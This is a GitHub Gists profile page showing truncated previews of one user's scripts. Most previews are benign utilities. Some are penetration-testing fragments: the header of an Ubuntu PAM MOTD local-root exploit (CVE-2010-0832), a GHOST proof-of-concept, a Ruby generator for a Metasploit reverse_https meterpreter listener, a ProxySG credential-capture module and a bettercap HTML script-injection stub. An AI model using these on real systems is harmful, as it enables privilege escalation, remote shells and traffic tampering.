Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View gabemarshall's full-sized avatar

Gabe Marshall gabemarshall

121 followers · 15 following
View GitHub Profile
@gabemarshall
gabemarshall / explain.sh
Last active August 29, 2015 14:05
Explainshell.com Bash Script (requires elinks)
#!/bin/bash
# If installing elinks via homebrew, install with `brew install elinks --devel`
MYURL="http://explainshell.com/explain?cmd="
count=0
for var in "$@"
do
@gabemarshall
gabemarshall / gist:bbf0b697523d846be076
Last active August 29, 2015 14:08
shell
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
@gabemarshall
gabemarshall / ghost.c
Created January 27, 2015 17:20
Ghost PoC binary
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
@gabemarshall
gabemarshall / keybase.md
Created February 27, 2015 23:31

Keybase proof

I hereby claim:

  • I am gabemarshall on github.
  • I am tehskylark (https://keybase.io/tehskylark) on keybase.
  • I have a public key whose fingerprint is 154F E7AE 6BB1 3694 A23C DA7B A6E4 E466 86E5 5D54

To claim this, I am signing this object:

@gabemarshall
gabemarshall / AutoListener.rb
Last active August 29, 2015 14:20
Simple ruby script to generate a metasploit rc file
#!/usr/bin/ruby
def meterpit(lhost, lport)
options = "use multi/handler\n"
options += "set payload windows/meterpreter/reverse_https\n"
options += "set LHOST #{lhost}\nset LPORT #{lport}\n"
options += "set ExitOnSession false\n"
options += "set AutoRunScript post/windows/manage/smart_migration\n"
options += "exploit -j\n"
@gabemarshall
gabemarshall / http_proxysg.rb
Last active April 4, 2016 15:40
PoC for Bluecoat ProxySG Auth Challenge Vulnerability
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# A fork of http ntlm capture module
# ProxySG SA97
# https://bto.bluecoat.com/security-advisory/sa93
##
require 'msf/core'
@gabemarshall
gabemarshall / tmux.sh
Created April 19, 2016 00:04
Sample script to start a tmux session with a vertically split window
#!/bin/bash
SESSION=$USER
tmux -2 new-session -d -s $SESSION
# Setup a window
tmux new-window -t $SESSION:1 -n 'The Internet'
# Split the window vertically
tmux split-window -v
@gabemarshall
gabemarshall / bettercap_activex.rb
Created November 24, 2015 00:50
class InjectJS < Proxy::Module
def on_request( request, response )
if response.content_type =~ /^text\/html.*/
if response.headers =~ /MSIE/
response.body.sub!( '</title>', "</title><script type='text/javascript'></script>" )
end
end
end
end
@gabemarshall
gabemarshall / powerhell.py
Created July 12, 2015 16:46
Powerhell
#!/usr/bin/env python
#
# Powerhell
#
# by Gabe Marshall
# base64 encodes command line argument to Windows PowerShell
#
# Heavily influenced by Carol Perez's ps_encoder script (https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py)
import base64
@gabemarshall
gabemarshall / gist:a2f3961afc1fc0ff2aa7
Created January 4, 2015 00:38
SED one liners
# Reference: http://www.pement.org/sed/sed1line.txt
-------------------------------------------------------------------------
USEFUL ONE-LINE SCRIPTS FOR SED (Unix stream editor) Dec. 29, 2005
Compiled by Eric Pement - pemente[at]northpark[dot]edu version 5.5
Latest version of this file (in English) is usually at:
http://sed.sourceforge.net/sed1line.txt
http://www.pement.org/sed/sed1line.txt